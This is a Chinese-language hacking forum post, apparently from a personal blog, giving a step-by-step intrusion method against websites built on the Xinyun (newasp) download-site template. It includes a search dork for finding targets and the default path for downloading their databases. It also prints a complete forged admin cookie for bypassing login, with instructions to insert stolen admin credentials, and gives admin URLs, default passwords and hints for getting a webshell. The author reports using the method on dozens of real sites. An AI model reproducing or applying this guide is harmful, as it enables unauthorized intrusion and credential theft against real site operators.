新云网站系统新漏洞的入侵过程

之所有斗胆标个原创，是因为没有看见其他的介绍这个站漏洞的，望高手不要见笑

用的都是些老技术，没新意，自己测试发现的，比较激动就发出来，原打算做个动画的，比较懒就直接

发个文章说说思路就算了。。不明白可以M偶：详谈（在线的情况下） QQ：69197054

http://www.newasp.net/这个网站开发的一个的一个模板

武汉市新云网络科技有限公司
--------------------------------------------------------------------------------
  新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司，主要从事网络应用软件开发、电子商务系统开发，程序订制、网站开发、网站策划、域名注册、空间租用等多项业务，为企业打造卓越的网络应用平台。

1。去baidu搜下 有很多的下载站都用的这个程序的模板

用下面的关键字搜索：

关键字：找到您需要的资源啦！？本站所有软件高速免费下载，记得下次再来哦，新云网络您下载的首选

（比较多，你可以截一部分搜索，我是用”新云网络您下载的首选“这个关键字搜索的）


搜了好几十页，还是比较多的，有的人用此模板的时候会改改，但是这个下载页面的关键字，却很少有改的，估计是不太方便改。

2.数据库默认地址 /database/%23newasp.mdb

（小于1.9M的数据库就别下了，假的 除非是个刚做好的站，空的数据库有1.83M 有的版本的有1.7M左右，大于50M的用下载工具下，除非你的网速够快，IE下载时间久了，服务器就会重置，你就白忙活了，要重下）

大部分的站都没有改，至少在我昨天的测试中下了三十几个数据库，不过只拿了2个webshell，还没有提权成功，懒的动了，数据库还放在电脑中。

3.cookie欺骗进后台
在本地搭建测试和在入侵中测试可以欺骗成功

cookie值：

ASPSESSIONIDCARADBTC=PPFHKFMBMFMGDOEIMKKPDFGL; admin%5Fnewasp=AdminStatus=%B8%DF%BC%B6%B9%DC%C0%ED%D4%B1&AdminID=1&Adminflag=SiteConfig%2CAdvertise%2CChannel%2CTemplate%2CTemplateLoad%2CAnnounce%2CAdminLog%2CSendMessage%2CCreateIndex%2CAddArticle1%2CAdminArticle1%2CAdminClass1%2CSpecial1%2CCreateArticle1%2CComment1%2CAdminJsFile1%2CAdminUpload1%2CAdminSelect1%2CAuditing1%2CAddSoft2%2CAdminSoft2%2CAdminClass2%2CSpecial2%2CCreateSoft2%2CComment2%2CAdminJsFile2%2CAdminUpload2%2CAdminSelect2%2CAuditing2%2CDownServer2%2CErrorSoft2%2CAddShop3%2CAdminShop3%2CAdminClass3%2CSpecial3%2CCreateShop3%2CComment3%2CAdminJsFile3%2CAdminUpload3%2CAdminSelect3%2CAuditing3%2CAddArticle5%2CAdminArticle5%2CAdminClass5%2CSpecial5%2CCreateArticle5%2CComment5%2CAdminJsFile5%2CAdminUpload5%2CAdminSelect5%2CAuditing5%2CDownServer5%2CAddUser%2CAdminUser%2CChangePassword%2CUserGroup%2CMainList%2COnline%2CVote%2CFriendLink%2CArticleCollect%2CSoftCollect%2CUploadFile%2CRenameData%2CBackupData%2CRestoreData%2CCompressData%2CSpaceSize%2CBatchReplace&AdminGrade=999&AdminPass=403466dc67f5d91e&RandomCode=3N263U7hgb314iwb&AdminName=admin


最后2行中的

AdminPass=403466dc67f5d91e

AdminName=admin

换成你在数据库中找到的管理员的帐号和密码的md5值

cookie修改工具：domain3.5自带有cookie修改的功能 或者 桂林老兵的 WEBTOOLS

后台登陆地址: /admin/admin_login.asp   （默认的用户名和密码都是admin，如果你运气好的话可以去试试）
后台管理页面: /admin/admin_index.asp

提示欺骗后台的时候直接进管理页面就行了

后台发表公告的地方可以传图片

而且有数据库备份和恢复的功能（如果你权限不够 AdminGrade=999 这个就是权限的问题，

没理由啊？数据库一定会至少有一个最高权限的管理员的帐号和密码的，换个欺骗呗）

剩下的就是拿shell提权   等等等的 事 留给你们做吧

最后提醒：技术研究，不要破坏，后果自负